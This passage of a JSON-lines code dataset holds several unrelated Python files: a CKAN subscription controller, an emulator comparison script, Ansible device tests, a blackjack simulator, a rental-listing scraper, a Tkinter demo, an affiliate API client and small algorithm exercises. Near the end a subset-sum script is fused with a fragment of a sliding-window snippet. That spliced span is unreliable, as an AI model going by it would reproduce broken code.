'dataset_id': request.POST.get('dataset'),\n            'group_id': request.POST.get('group'),\n            'organization_id': request.POST.get('organization'),\n        }\n        context = {\n            u'model': model,\n            u'session': model.Session,\n            u'user': g.user,\n            u'auth_user_obj': g.userobj\n        }\n        try:\n            subscription = get_action(u'subscribe_signup')(context, data_dict)\n        except ValidationError as err:\n            error_messages = []\n            for key_ignored in ('message', '__before', 'dataset_id',\n                                'group_id'):\n                if key_ignored in err.error_dict:\n                    error_messages.extend(err.error_dict.pop(key_ignored))\n            if err.error_dict:\n                error_messages.append(repr(err.error_dict))\n            h.flash_error(_('Error subscribing: {}'\n                            .format('; '.join(error_messages))))\n            return self._redirect_back_to_subscribe_page_from_request(data_dict)\n        except MailerException:\n            h.flash_error(_('Error sending email - please contact an '\n                            'administrator for help'))\n            return self._redirect_back_to_subscribe_page_from_request(data_dict)\n        else:\n            h.flash_success(\n                _('Subscription requested. 
Please confirm by clicking the '\n                  'link in the email just sent to you'))\n            return self._redirect_back_to_subscribe_page(\n                subscription['object_name'], subscription['object_type'])\n\n    def verify_subscription(self):\n        data_dict = {'code': request.params.get('code')}\n        context = {\n            u'model': model,\n            u'session': model.Session,\n            u'user': g.user,\n            u'auth_user_obj': g.userobj\n        }\n\n        try:\n            subscription = get_action(u'subscribe_verify')(context, data_dict)\n        except ValidationError as err:\n            h.flash_error(_('Error subscribing: {}'\n                            .format(err.error_dict['message'])))\n            return redirect_to('home')\n\n        h.flash_success(\n            _('Subscription confirmed'))\n        code = email_auth.create_code(subscription['email'])\n\n        return redirect_to(\n            controller='ckanext.subscribe.controller:SubscribeController',\n            action='manage',\n            code=code,\n        )\n\n    def manage(self):\n        code = request.params.get('code')\n        if not code:\n            h.flash_error('Code not supplied')\n            log.debug('No code supplied')\n            return self._request_manage_code_form()\n        try:\n            email = email_auth.authenticate_with_code(code)\n        except ValueError as exp:\n            h.flash_error('Code is invalid: {}'.format(exp))\n            log.debug('Code is invalid: {}'.format(exp))\n            return self._request_manage_code_form()\n\n        # user has done auth, but it's an email rather than a ckan user, so\n        # use site_user\n        site_user = get_action('get_site_user')({\n            'model': model,\n            'ignore_auth': True},\n            {}\n        )\n        context = {\n            u'model': model,\n            u'user': site_user['name'],\n        }\n        subscriptions = \\\n            get_action(u'subscribe_list_subscriptions')(\n                context, {'email': email})\n        frequency_options = [\n            dict(text=f.name.lower().capitalize().replace(\n                'Immediate', 'Immediately'),\n                 value=f.name)\n            for f in sorted(subscribe_model.Frequency, key=lambda x: x.value)\n        ]\n        return render(u'subscribe/manage.html', extra_vars={\n            'email': email,\n            'code': code,\n            'subscriptions': subscriptions,\n            'frequency_options': frequency_options,\n        })\n\n    def update(self):\n        code = request.POST.get('code')\n        if not code:\n            h.flash_error('Code not supplied')\n            log.debug('No code supplied')\n            return self._request_manage_code_form()\n        try:\n            email = email_auth.authenticate_with_code(code)\n        except ValueError as exp:\n            h.flash_error('Code is invalid: {}'.format(exp))\n            log.debug('Code is invalid: {}'.format(exp))\n            return self._request_manage_code_form()\n\n        subscription_id = request.POST.get('id')\n        if not subscription_id:\n            abort(400, _(u'No id supplied'))\n        subscription = model.Session.query(subscribe_model.Subscription) \\\n            .get(subscription_id)\n        if not subscription:\n            abort(404, _(u'That subscription ID does not exist.'))\n        if subscription.email != email:\n            h.flash_error('Code is invalid for that subscription')\n            log.debug('Code is invalid for that subscription')\n            return self._request_manage_code_form()\n\n        frequency = request.POST.get('frequency')\n        if not frequency:\n            abort(400, _(u'No frequency supplied'))\n\n        # user has done auth, but it's an email rather than a ckan user, so\n        # use site_user\n        site_user = get_action('get_site_user')({\n            'model': model,\n            'ignore_auth': True},\n            {}\n        )\n        context = {\n            u'model': model,\n            u'session': model.Session,\n            u'user': site_user['name'],\n        }\n        data_dict = {\n            'id': subscription_id,\n            'frequency': frequency,\n        }\n        try:\n            get_action(u'subscribe_update')(context, data_dict)\n        except ValidationError as err:\n            h.flash_error(_('Error updating subscription: {}'\n                            .format(err.error_dict['message'])))\n        else:\n            h.flash_success(_('Subscription updated'))\n\n        return 
redirect_to(\n controller='ckanext.subscribe.controller:SubscribeController',\n action='manage',\n code=code,\n )\n\n def unsubscribe(self):\n # allow a GET or POST to do this, so that we can trigger it from a link\n # in an email or a web form\n code = request.params.get('code')\n if not code:\n h.flash_error('Code not supplied')\n log.debug('No code supplied')\n return self._request_manage_code_form()\n try:\n email = email_auth.authenticate_with_code(code)\n except ValueError as exp:\n h.flash_error('Code is invalid: {}'.format(exp))\n log.debug('Code is invalid: {}'.format(exp))\n return self._request_manage_code_form()\n\n # user has done auth, but it's an email rather than a ckan user, so\n # use site_user\n site_user = get_action('get_site_user')({\n 'model': model,\n 'ignore_auth': True},\n {}\n )\n context = {\n u'model': model,\n u'user': site_user['name'],\n }\n data_dict = {\n 'email': email,\n 'dataset_id': request.params.get('dataset'),\n 'group_id': request.params.get('group'),\n 'organization_id': request.params.get('organization'),\n }\n try:\n object_name, object_type = \\\n get_action(u'subscribe_unsubscribe')(context, data_dict)\n except ValidationError as err:\n error_messages = []\n for key_ignored in ('message', '__before', 'dataset_id',\n 'group_id'):\n if key_ignored in err.error_dict:\n error_messages.extend(err.error_dict.pop(key_ignored))\n if err.error_dict:\n error_messages.append(repr(err.error_dict))\n h.flash_error(_('Error unsubscribing: {}'\n .format('; '.join(error_messages))))\n except ObjectNotFound as err:\n h.flash_error(_('Error unsubscribing: {}'.format(err)))\n else:\n h.flash_success(\n _('You are no longer subscribed to this {}'\n .format(object_type)))\n return self._redirect_back_to_subscribe_page(object_name,\n object_type)\n return self._redirect_back_to_subscribe_page_from_request(data_dict)\n\n def unsubscribe_all(self):\n # allow a GET or POST to do this, so that we can trigger it from a link\n # in an email or a web form\n code = request.params.get('code')\n if not code:\n h.flash_error('Code not supplied')\n log.debug('No code supplied')\n return self._request_manage_code_form()\n try:\n email = email_auth.authenticate_with_code(code)\n except ValueError as exp:\n h.flash_error('Code is invalid: {}'.format(exp))\n log.debug('Code is invalid: {}'.format(exp))\n return self._request_manage_code_form()\n\n # user has done auth, but it's an email rather than a ckan user, so\n # use site_user\n site_user = get_action('get_site_user')({\n 'model': model,\n 'ignore_auth': True},\n {}\n )\n context = {\n u'model': model,\n u'user': site_user['name'],\n }\n data_dict = {\n 'email': email,\n }\n try:\n get_action(u'subscribe_unsubscribe_all')(context, data_dict)\n except ValidationError as err:\n error_messages = []\n for key_ignored in ('message', '__before'):\n if key_ignored in err.error_dict:\n error_messages.extend(err.error_dict.pop(key_ignored))\n if err.error_dict:\n error_messages.append(repr(err.error_dict))\n h.flash_error(_('Error unsubscribing: {}'\n .format('; '.join(error_messages))))\n except ObjectNotFound as err:\n h.flash_error(_('Error unsubscribing: {}'.format(err)))\n else:\n h.flash_success(\n _('You are no longer subscribed to notifications from {}'\n .format(config.get('ckan.site_title'))))\n return redirect_to('home')\n return redirect_to(\n controller='ckanext.subscribe.controller:SubscribeController',\n action='manage',\n code=code,\n )\n\n def _redirect_back_to_subscribe_page(self, object_name, object_type):\n if 
object_type == 'dataset':\n return redirect_to(controller='package', action='read',\n id=object_name)\n elif object_type == 'group':\n return redirect_to(controller='group', action='read',\n id=object_name)\n elif object_type == 'organization':\n return redirect_to(controller='organization', action='read',\n id=object_name)\n else:\n return redirect_to('home')\n\n def _redirect_back_to_subscribe_page_from_request(self, data_dict):\n if data_dict.get('dataset_id'):\n dataset_obj = model.Package.get(data_dict['dataset_id'])\n return redirect_to(\n controller='package', action='read',\n id=dataset_obj.name if dataset_obj else data_dict['dataset_id']\n )\n elif data_dict.get('group_id'):\n group_obj = model.Group.get(data_dict['group_id'])\n controller = 'organization' \\\n if group_obj and group_obj.is_organization \\\n else 'group'\n return redirect_to(\n controller=controller, action='read',\n id=group_obj.name if group_obj else data_dict['group_id'])\n else:\n return redirect_to('home')\n\n def _request_manage_code_form(self):\n return redirect_to(\n controller='ckanext.subscribe.controller:SubscribeController',\n action='request_manage_code',\n )\n\n def request_manage_code(self):\n email = request.POST.get('email')\n if not email:\n return render(u'subscribe/request_manage_code.html', extra_vars={})\n\n context = {\n u'model': model,\n }\n try:\n get_action(u'subscribe_request_manage_code')(\n context, dict(email=email))\n except ValidationError as err:\n error_messages = []\n for key_ignored in ('message', '__before'):\n if key_ignored in err.error_dict:\n error_messages.extend(err.error_dict.pop(key_ignored))\n if err.error_dict:\n error_messages.append(repr(err.error_dict))\n h.flash_error(_('Error requesting code: {}'\n .format('; '.join(error_messages))))\n except ObjectNotFound as err:\n h.flash_error(_('Error requesting code: {}'.format(err)))\n except MailerException:\n h.flash_error(_('Error sending email - please contact an '\n 'administrator for help'))\n else:\n h.flash_success(\n _('An access link has been emailed to: {}'\n .format(email)))\n return redirect_to('home')\n return render(u'subscribe/request_manage_code.html',\n extra_vars={'email': email})\n","repo_name":"bellisk/ckanext-subscribe","sub_path":"ckanext/subscribe/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":14543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41537288338","text":"#!/usr/bin/env python3\n\n\"\"\"\nRuns two emulators in parallel and stops when the output from them differs.\n\nThe emulators have to print the contents of everything that should be\ncompared to stdout. The format of the print-out should be exactly the\nsame for both emulators. Each log line should end with '\\n' (newline).\n\nThe emulators also have to respond to commands via stdin. This script expects\nthe emulators to send one log line at a time to stdout. When the script is ready\nfor a new log line (i.e. a new instruction to be executed) it will send 'n' and\nthen enter. It also expects the emulators to quit when sending 'q' and then\nenter. The emulators have to flush to stdout instantly.\n\nDo this before running this script:\n\n- Put both emulators and their dependencies in the same directory.\n- Set up the name and args to the emulator under test and reference emulator.\n The config is found in the emulator_under_test and reference_emulator objects.\n- Set the log_line_token variable. 
It should be a unique string that is found in\n the log lines, and is used to identify the start of the log output.\n- Make the emulators flush immediately when printing to stdout.\n * In C: setbuf(stdout, NULL);\n * In C++: std::cout << \"output\" << std::flush;\n- Make the emulators listen to commands on stdin:\n * Execute a new instruction when receiving 'n'.\n * Quit when receiving 'q'.\n- The working directory of the script should be the same as the emulator\n binaries.\n\nThe script compares one instruction at a time. It compares by string comparison.\nAfter comparing the emulator under test vs. the reference emulator, it will\nask the emulators to execute a new instruction if no difference was found.\nIt will quit and show the last 20 executed instructions if a diff was found\nbetween them. For test binaries such as zexdoc it could take billions of\ninstructions before a diff is found.\n\nIf one or both of the emulators run to completion, i.e. no diffs are found, the\nscript will exit with exceptions etc. This is because it loses connection to the\nemulator and there's no soft shutdown.\n\nTested on Python 3.8.8 only. Will need at least Python 3. Also, only tested on\nLinux.\n\"\"\"\n\nimport asyncio\n\n\nclass Emulator:\n def __init__(self, name: str, args: []):\n self.name = name\n self.args = args\n\n def __str__(self):\n name = self.name\n maybe_space = ' ' if len(self.args) > 0 else ''\n args = ' '.join(self.args)\n\n return './' + name + maybe_space + args\n\n\n# Must be adapted to each emulator:\nemulator_under_test = Emulator('emulator', ['run', 'zexdoc'])\nreference_emulator = Emulator('z80_tests', [])\nlog_line_token = 'pc=0x'\n\n# Can be changed if you really want to:\nqueue_length = 20\nlog_string_encoding = 'utf-8'\nnew_instruction_character = b\"n\\n\"\n\n\nasync def setup(sut_config: Emulator, ref_config: Emulator):\n sut = await asyncio.subprocess.create_subprocess_exec(\n f'./{sut_config.name}', *sut_config.args,\n stdin=asyncio.subprocess.PIPE,\n stdout=asyncio.subprocess.PIPE\n )\n ref = await asyncio.subprocess.create_subprocess_exec(\n f'./{ref_config.name}', *ref_config.args,\n stdin=asyncio.subprocess.PIPE,\n stdout=asyncio.subprocess.PIPE\n )\n\n return sut, ref\n\n\nasync def get_to_first_line(emu_process: asyncio.subprocess.Process):\n binary_line = await emu_process.stdout.readuntil(b\"\\n\")\n\n while binary_line:\n str_line = binary_line.decode(log_string_encoding).strip(\"\\n\")\n if log_line_token in str_line:\n return str_line\n else:\n emu_process.stdin.write(new_instruction_character)\n\n binary_line = await emu_process.stdout.readuntil(b\"\\n\")\n\n\ndef print_arrow_at_first_diff(sut_line, ref_line, offset):\n diff_pos = 0\n for pos in range(0, len(sut_line)):\n if sut_line[pos] == ref_line[pos]:\n diff_pos += 1\n else:\n break\n\n print(' ' * (diff_pos + offset) + '^')\n\n\nasync def compare_emulator_outputs(sut, sut_line, ref, ref_line):\n sut.stdin.write(new_instruction_character)\n ref.stdin.write(new_instruction_character)\n queue = []\n line_number = 0\n\n while sut_line == ref_line:\n if len(queue) < queue_length:\n queue.append(sut_line)\n else:\n queue.append(sut_line)\n queue.pop(0)\n\n if \"pc=0x\" not in sut_line:\n print(sut_line)\n\n sut_binary_line = await sut.stdout.readuntil(b\"\\n\")\n sut_line = sut_binary_line.decode(log_string_encoding).strip(\"\\n\")\n sut.stdin.write(new_instruction_character)\n\n ref_binary_line = await ref.stdout.readuntil(b\"\\n\")\n ref_line = ref_binary_line.decode(log_string_encoding).strip(\"\\n\")\n 
ref.stdin.write(new_instruction_character)\n\n line_number += 1\n\n if line_number % 1000000 == 0:\n print(f\"At line number: {line_number:,}\")\n\n print(\"********** FOUND DIFFERENCE IN THE EMULATORS **********\")\n print(f\"Line number: {line_number}\\n\\n\")\n print(f\"Last {queue_length} instructions before the diff:\\n\")\n for line in queue:\n print(line)\n\n print()\n print(f\"SUT: {sut_line}\")\n print(f\"REF: {ref_line}\")\n print_arrow_at_first_diff(sut_line, ref_line, 5)\n\n\nasync def main():\n sut, ref = await setup(emulator_under_test, reference_emulator)\n\n print(f\"\\nStarting comparison between '{emulator_under_test}' and '{reference_emulator}'\")\n\n sut_line = await get_to_first_line(sut)\n ref_line = await get_to_first_line(ref)\n\n print(\"Found the first log lines of each emulator. Starting on comparison...\\n\\n\")\n\n await compare_emulator_outputs(sut, sut_line, ref, ref_line)\n\n\nasyncio.run(main())\n","repo_name":"mika-s/MikasEmulators","sub_path":"helpers/compare_emulators_interactively.py","file_name":"compare_emulators_interactively.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28424872500","text":"import pytest\n\npytest.importorskip(\"kick\")\n\nfrom ansible_collections.community.general.plugins.module_utils.network.ftd.device import FtdPlatformFactory, FtdModel, FtdAsa5500xPlatform, \\\n Ftd2100Platform, AbstractFtdPlatform\nfrom ansible_collections.community.general.tests.unit.modules.network.ftd.test_ftd_install import DEFAULT_MODULE_PARAMS\n\n\nclass TestFtdModel(object):\n\n def test_has_value_should_return_true_for_existing_models(self):\n assert FtdModel.FTD_2120 in FtdModel.supported_models()\n assert FtdModel.FTD_ASA5516_X in FtdModel.supported_models()\n\n def test_has_value_should_return_false_for_non_existing_models(self):\n assert 'nonExistingModel' not in FtdModel.supported_models()\n assert None not in FtdModel.supported_models()\n\n\nclass TestFtdPlatformFactory(object):\n\n @pytest.fixture(autouse=True)\n def mock_devices(self, mocker):\n mocker.patch('ansible_collections.community.general.plugins.module_utils.network.ftd.device.Kp')\n mocker.patch('ansible_collections.community.general.plugins.module_utils.network.ftd.device.Ftd5500x')\n\n def test_factory_should_return_corresponding_platform(self):\n ftd_platform = FtdPlatformFactory.create(FtdModel.FTD_ASA5508_X, dict(DEFAULT_MODULE_PARAMS))\n assert type(ftd_platform) is FtdAsa5500xPlatform\n ftd_platform = FtdPlatformFactory.create(FtdModel.FTD_2130, dict(DEFAULT_MODULE_PARAMS))\n assert type(ftd_platform) is Ftd2100Platform\n\n def test_factory_should_raise_error_with_not_supported_model(self):\n with pytest.raises(ValueError) as ex:\n FtdPlatformFactory.create('nonExistingModel', dict(DEFAULT_MODULE_PARAMS))\n assert \"FTD model 'nonExistingModel' is not supported by this module.\" == ex.value.args[0]\n\n\nclass TestAbstractFtdPlatform(object):\n\n def test_install_ftd_image_raise_error_on_abstract_class(self):\n with pytest.raises(NotImplementedError):\n AbstractFtdPlatform().install_ftd_image(dict(DEFAULT_MODULE_PARAMS))\n\n def test_supports_ftd_model_should_return_true_for_supported_models(self):\n assert Ftd2100Platform.supports_ftd_model(FtdModel.FTD_2120)\n assert FtdAsa5500xPlatform.supports_ftd_model(FtdModel.FTD_ASA5516_X)\n\n def test_supports_ftd_model_should_return_false_for_non_supported_models(self):\n assert not 
AbstractFtdPlatform.supports_ftd_model(FtdModel.FTD_2120)\n assert not Ftd2100Platform.supports_ftd_model(FtdModel.FTD_ASA5508_X)\n assert not FtdAsa5500xPlatform.supports_ftd_model(FtdModel.FTD_2120)\n\n def test_parse_rommon_file_location(self):\n server, path = AbstractFtdPlatform.parse_rommon_file_location('tftp://1.2.3.4/boot/rommon-boot.foo')\n assert '1.2.3.4' == server\n assert '/boot/rommon-boot.foo' == path\n\n def test_parse_rommon_file_location_should_fail_for_non_tftp_protocol(self):\n with pytest.raises(ValueError) as ex:\n AbstractFtdPlatform.parse_rommon_file_location('http://1.2.3.4/boot/rommon-boot.foo')\n assert 'The ROMMON image must be downloaded from TFTP server' in str(ex.value)\n\n\nclass TestFtd2100Platform(object):\n\n @pytest.fixture\n def kp_mock(self, mocker):\n return mocker.patch('ansible_collections.community.general.plugins.module_utils.network.ftd.device.Kp')\n\n @pytest.fixture\n def module_params(self):\n return dict(DEFAULT_MODULE_PARAMS)\n\n def test_install_ftd_image_should_call_kp_module(self, kp_mock, module_params):\n ftd = FtdPlatformFactory.create(FtdModel.FTD_2110, module_params)\n ftd.install_ftd_image(module_params)\n\n assert kp_mock.called\n assert kp_mock.return_value.ssh_console.called\n ftd_line = kp_mock.return_value.ssh_console.return_value\n assert ftd_line.baseline_fp2k_ftd.called\n assert ftd_line.disconnect.called\n\n def test_install_ftd_image_should_call_disconnect_when_install_fails(self, kp_mock, module_params):\n ftd_line = kp_mock.return_value.ssh_console.return_value\n ftd_line.baseline_fp2k_ftd.side_effect = Exception('Something went wrong')\n\n ftd = FtdPlatformFactory.create(FtdModel.FTD_2120, module_params)\n with pytest.raises(Exception):\n ftd.install_ftd_image(module_params)\n\n assert ftd_line.baseline_fp2k_ftd.called\n assert ftd_line.disconnect.called\n\n\nclass TestFtdAsa5500xPlatform(object):\n\n @pytest.fixture\n def asa5500x_mock(self, mocker):\n return mocker.patch('ansible_collections.community.general.plugins.module_utils.network.ftd.device.Ftd5500x')\n\n @pytest.fixture\n def module_params(self):\n return dict(DEFAULT_MODULE_PARAMS)\n\n def test_install_ftd_image_should_call_kp_module(self, asa5500x_mock, module_params):\n ftd = FtdPlatformFactory.create(FtdModel.FTD_ASA5508_X, module_params)\n ftd.install_ftd_image(module_params)\n\n assert asa5500x_mock.called\n assert asa5500x_mock.return_value.ssh_console.called\n ftd_line = asa5500x_mock.return_value.ssh_console.return_value\n assert ftd_line.rommon_to_new_image.called\n assert ftd_line.disconnect.called\n\n def test_install_ftd_image_should_call_disconnect_when_install_fails(self, asa5500x_mock, module_params):\n ftd_line = asa5500x_mock.return_value.ssh_console.return_value\n ftd_line.rommon_to_new_image.side_effect = Exception('Something went wrong')\n\n ftd = FtdPlatformFactory.create(FtdModel.FTD_ASA5516_X, module_params)\n with pytest.raises(Exception):\n ftd.install_ftd_image(module_params)\n\n assert ftd_line.rommon_to_new_image.called\n assert ftd_line.disconnect.called\n","repo_name":"ansible-collection-migration/community.general","sub_path":"tests/unit/module_utils/network/ftd/test_device.py","file_name":"test_device.py","file_ext":"py","file_size_in_byte":5687,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"3430484715","text":"# Blackjack basic strategy simulator\n\nimport random\n\nfrom Deck import Deck\nfrom Hand import Hand\nfrom Dealer import Dealer\nfrom Player import 
Player\nfrom Data import Data\n\ndata = Data()\n\ndeck = Deck(4, 0.75)\ndeck.shuffle()\n\nNUM_ROUNDS = 1000000\n\n# Init dealer and player\ndealer = Dealer(False)\nplayer = Player(1000)\n\n# Main game loop\nfor _ in range(NUM_ROUNDS):\n    player.dealHand(deck)\n    dealer.dealHand(deck)\n\n    dealerUpCardVal = dealer.getShowingCard().getCardValForStats()\n\n    if (dealer.hand.getHandVal() == 21 or player.hand.getHandVal() == 21):\n        player.clearHand()\n        dealer.clearHand()\n        continue\n    else:\n        # Make a random choice: 0 - Stand, 1 - Hit (randrange(0, 2) never returns 2, so Double is not simulated)\n        choice = random.randrange(0, 2)\n\n        if (choice == 0):\n            playerHandVal = player.hand.getHandVal()\n\n            dealer.hitUntilDone(deck)\n            dealerHandVal = dealer.hand.getHandVal()\n\n            data.compareHandsAndLogResult(player.hand.getStatName(), dealerUpCardVal, playerHandVal, dealerHandVal, choice)\n        else:\n            playerHandName = player.hand.getStatName()\n            player.hit(deck)\n\n            dealer.hitUntilDone(deck)\n            dealerHandVal = dealer.hand.getHandVal()\n\n            data.compareHandsAndLogResult(playerHandName, dealerUpCardVal, player.hand.getHandVal(), dealerHandVal, choice)\n\n    player.clearHand()\n    dealer.clearHand()\n\n    if (deck.needsShuffle()):\n        deck.shuffle()\n\ndata.printResults()","repo_name":"arkostin/blackjackSim","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"3304401724","text":"# coding=utf-8\r\nimport json\r\nimport os\r\nimport pandas as pd\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\n\r\n\r\ndef store_info():\r\n    output_file_name = 'ftx-2.xlsx'\r\n    df = pd.DataFrame(get_info_from())\r\n    df.to_excel(output_file_name, index=False)\r\n\r\n\r\ndef get_detail_from(url):\r\n    content = requests.get(url)\r\n\r\n    soup = BeautifulSoup(content.text, 'lxml')\r\n\r\n    phone = ''\r\n\r\n    if soup.select('p.text_phone'):\r\n        phone = str(soup.select('p.text_phone')[0].get_text()).replace(' ', '')\r\n    elif soup.select('div.tjcont-jjr-line2'):\r\n        phone = str(soup.select('div.tjcont-jjr-line2')[0].get_text()).replace(' ', '')\r\n    else:\r\n        pass\r\n\r\n    detail_info = {\r\n        'phone': phone,\r\n        'type': soup.select('div.tt')[1].get_text(),\r\n        'area': soup.select('div.tt')[2].get_text()\r\n    }\r\n\r\n    return detail_info\r\n\r\n\r\ndef get_info_from():\r\n    # url = 'https://sz.zu.fang.com/house-a089-b02095/g21/'\r\n    url = 'https://sz.zu.fang.com/house-a089-b02095/g21-i32/'\r\n\r\n    host = 'https://sz.zu.fang.com'\r\n\r\n    content = requests.get(url)\r\n\r\n    soup = BeautifulSoup(content.text, 'lxml')\r\n\r\n    house_detail_list = []\r\n\r\n    for item in soup.select('dd.info'):\r\n        href = item.select('a')[0].get('href')\r\n        title = item.select('p')[0].get_text()\r\n        des = item.select('p')[1].get_text()\r\n        location = item.select('p')[2].get_text()\r\n        price = item.select('span.price')[0].get_text()\r\n\r\n        house_info = {\r\n            'href': host + href,\r\n            'title': title,\r\n            'des': str(des).replace(' ', ''),\r\n            'location': location,\r\n            'price': price\r\n        }\r\n\r\n        detail_info = {}\r\n        detail_info.update(house_info)\r\n        detail_info.update(get_detail_from(host + href))\r\n\r\n        house_detail_list.append(detail_info)\r\n\r\n    return house_detail_list\r\n\r\n\r\nif __name__ == '__main__':\r\n    store_info()\r\n","repo_name":"hiyaojie/python-crawler","sub_path":"house-crawler/src/fangtx.py","file_name":"fangtx.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"9423853232","text":"'''\r\nHello World\r\nOOPs Method\r\n'''\r\n\r\nfrom tkinter import *\r\n\r\nclass HelloNameFrame(Frame):\r\n\r\n def __init__(self, the_window):\r\n\r\n Frame.__init__(self, the_window)\r\n\r\n self.user_name = StringVar()\r\n self.display_string = StringVar()\r\n \r\n self.label_1 = Label(self, text='Name: ').grid(row=0,column=0)\r\n self.name = Entry(self, textvariable=self.user_name).grid(row=0,column=1)\r\n self.button = Button(self,text='Click Me', command=self.display_output).grid(row=1,column=0)\r\n self.display_label = Label(self, textvariable = self.display_string, relief='solid', width=15).grid(row=1,column=1)\r\n\r\n def display_output(self):\r\n self.display_string.set('Hello ' + self.user_name.get())\r\n \r\n\r\nroot = Tk()\r\nframe_A = HelloNameFrame(root)\r\nframe_A.grid(row=0,column=0)\r\nroot.mainloop()\r\n \r\n","repo_name":"Platforuma/Beginner-s_Python_Codes","sub_path":"13_GUI/22_Tkinter--Hello-name-class-method.py","file_name":"22_Tkinter--Hello-name-class-method.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12096849741","text":"\nimport urllib2\nfrom lxml import objectify\n\nUSER_AGENT = 'python-linkshare'\nPRODUCT_SEARCH_URL = \"http://productsearch.linksynergy.com/productsearch?token={0}\"\nRESULTS_URL = \"{0}&MaxResults={1}&pagenumber={2}\"\n\nclass API(object):\n def __init__(self, token='', max_results=20, **kwargs):\n self.token = token\n self.max_results = max_results\n\n def product_search(self, mid=None, keyword=None, cat=None, sorts=None, sorttypes=None):\n search_url_parts = [PRODUCT_SEARCH_URL.format(self.token)]\n if mid is not None:\n search_url_parts.append('mid={0}'.format(mid))\n if keyword is not None:\n search_url_parts.append('keyword={0}'.format(keyword))\n if cat is not None:\n search_url_parts.append('cat={0}'.format(cat))\n if sorts:\n if len(sorts) != len(sorttypes):\n raise ValueError(\"sorts sequence must be the same length as sorttypes sequence\")\n for sort, sorttype in zip(sorts, sorttypes):\n search_url_parts.append('sort={0}&sorttype={1}'.format(sort, sorttype))\n search_url = '&'.join(search_url_parts)\n return _results_generator(search_url, self.max_results)\n\nclass MerchantAPI(API):\n def __init__(self, mid='', **kwargs):\n self.mid = mid\n API.__init__(self, **kwargs)\n\n def product_search(self, **kwargs):\n kwargs['mid'] = self.mid\n return API.product_search(self, **kwargs)\n\ndef _results_generator(base_url, max_results):\n page = 1\n opener = urllib2.build_opener()\n headers = {'User-Agent': USER_AGENT}\n while True:\n request = urllib2.Request(RESULTS_URL.format(base_url, max_results, page),\n headers=headers)\n result = objectify.parse(opener.open(request)).getroot()\n if hasattr(result, 'item'):\n for item in result.item:\n yield item\n else:\n break\n page += 1\n","repo_name":"brildum/python-linkshare","sub_path":"linkshare/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"8026258179","text":"arr = [1, 6, 11, 5]\r\nn = len(arr)\r\nmax_value = sum(arr)\r\nt = [[None for i in range(max_value+1)]for j in range(n+1)]\r\nfor i in range(n+1):\r\n t[i][0] = True\r\nfor j in range(1,max_value+1):\r\n t[0][j] = False\r\nfor i in range(1,n+1):\r\n for j in range(1,max_value+1):\r\n if arr[i-1]<= j:\r\n t[i][j] = t[i-1][j-arr[i-1]] or t[i-1][j]\r\n 
else:\r\n t[i][j] = t[i-1][j]\r\narr_final = []\r\n'''\r\nTraversing the last row and \r\nfetching all the \"TRUE\" values into arr_final \r\n'''\r\nfor i in range(0,max_value+1):\r\n a = t[n][i]\r\n #print(a)\r\n #print()\r\n if a == True:\r\n #print(\"YES\")\r\n arr_final.append(i)\r\n else:\r\n continue\r\n\r\n'''\r\nmini = range - 2*S1 {here range is nothing but the maximum sum}\r\nand depending upon the number of values we take the even loop or the odd loop\r\n'''\r\nmini = 10e7\r\nlength = len(arr_final)\r\nif length%2 == 0:\r\n length = length //2\r\nelse:\r\n length = (length//2)+1\r\n\r\n'''\r\nWe only traverse the first half \r\nof the array because we only need \r\ns1 to check the condition {range - 2*S1},\r\nand whenever we find a smaller value \r\nwe store it in mini\r\n'''\r\nfor i in range(length):\r\n a = max_value - 2*(arr_final[i])\r\n if a < mini:\r\n mini = a\r\nprint(mini)\r\nwhile cur > K:\n if S[l] == '.':\n cur -= 1\n l += 1\n ans = max(ans, r - l + 1)\nprint(ans)\n","repo_name":"kotadd/competitive_programming","sub_path":"syakutori/abc229_d.py","file_name":"abc229_d.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"23226842930","text":"# Task\n# You are given a string S. Your task is to find out if the string S contains: alphanumeric characters, alphabetical characters, digits, lowercase and uppercase characters.\n\n# Input Format\n# A single line containing a string S.\n\n# Constraints 0 < len(S) < 1000\n\n# Output Format\n# In the first line, print True if S has any alphanumeric characters. Otherwise, print False.\n# In the second line, print True if S has any alphabetical characters. Otherwise, print False.\n# In the third line, print True if S has any digits. Otherwise, print False.\n# In the fourth line, print True if S has any lowercase characters. Otherwise, print False.\n# In the fifth line, print True if S has any uppercase characters. Otherwise, print False. 
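The loop-based solution below meets this spec; for comparison, a minimal sketch of the same five checks using any() with generator expressions (the sample string is hard-coded so the sketch runs standalone):

s = "qA2"  # stand-in for input()
for method in ("isalnum", "isalpha", "isdigit", "islower", "isupper"):
    # any() short-circuits on the first character that passes the check
    print(any(getattr(ch, method)() for ch in s))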
